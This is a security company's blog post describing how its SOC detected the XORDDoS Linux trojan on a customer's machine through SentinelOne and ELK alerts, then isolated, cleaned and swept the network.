Tech

XORDDoS Detection on a Customer’s Machine

Post by Ivan Dabić
Subscribe to our blog articles!
April 2, 2025 | 2 minutes read

The Alert

As part of our 24/7 managed SOC service, we aggregate logs from client endpoints into our centralized ELK SIEM platform, giving us full visibility and correlation across the entire infrastructure.

One such log, sent from a SentinelOne Linux agent, was flagged in ELK for immediate attention. The alert pointed to a malware detection event. Our SOC team was reviewing the data.

In the log details, within the incident timeline and event details, we saw:
sentinel_one.threat.name: XORDDoS

Identification

Alert in ELK:

Opening the Incidents view, we could see the threat alert listed as “Malware Threat Detected”. Expanding details for it, we’ll have more information:

Opening the kibana explorer from previous view we can go into timeline for this threat:

And then we should add a column to display the malware name detected by choosing the sentinel_one.threat.name from the Selected fields group on the left:

When we add this column to the view we’ll see the name of the detected malware, and in our case it was XORDDoS:

Response

XORDDoS is a stealthy Linux-targeting Trojan designed to recruit systems into botnets for DDoS attacks. While SentinelOne had already blocked the threat, it was our ELK stack that brought it to the surface and escalated it to human analysts in real time:

  • SentinelOne caught the threat
  • ELK correlated and escalated the alert
  • Our team took action immediately

Isolate the Host
We instantly removed the affected machine from the network to prevent any potential lateral movement or outbound command-and-control communication.

Scan & Clean
A full manual review and additional scans were performed. We confirmed that all malicious components were quarantined and removed — including any persistence mechanisms like cron jobs or disguised binaries.

Sweep the Network
We extended the investigation to the entire network segment. Fortunately, thanks to early detection, there were no signs of further compromise.

With the machine cleaned, the alert resolved, and the surrounding systems cleared, we closed the incident and delivered a post-mortem report to the client. No disruption, no data leakage — just fast detection and even faster response.

Ivan Dabić

A man with a beard and glasses, wearing an orange hoodie and a black cap with a Hard Rock Cafe logo, stands with his arms crossed against a plain white background.

Ivan Dabić

Co-founder and CEO of BlueGrid.io, with a background in cloud infrastructure, distributed systems, monitoring, and security operations. He works closely with engineering teams to build and operate reliable systems while documenting both technical and organizational aspects of modern engineering work.

Ivan is a metalhead, and big fan of cyberpunk move genre. If you are his secret Santa go with Star Wars Lego box!

More from Ivan Dabić

Related Posts

CVE-2025-24201 Vulnerability
Tech | 1 year ago

How BlueGrid.io Secured Its Customers From CVE-2025-24201
In the center of the image there is a computer monitor displaying a security shield with a keyhole, on the left side is plant. Around the computer monitor are icons, such as email icon, arrows, lock icon, gears, triangle with an exclamation mark.
Tech | 2 years ago

Addressing Physical Security Threats in the Digital Age – Part 1
In the center of the image there is a computer monitor displaying a security shield with a keyhole, on the left side is plant. Around the computer monitor are icons, such as email icon, arrows, lock icon, gears, triangle with an exclamation mark.
Tech | 2 years ago

Addressing Physical Security Threats In The Digital Age – Part 2
Share this post

Share this link via

Or copy link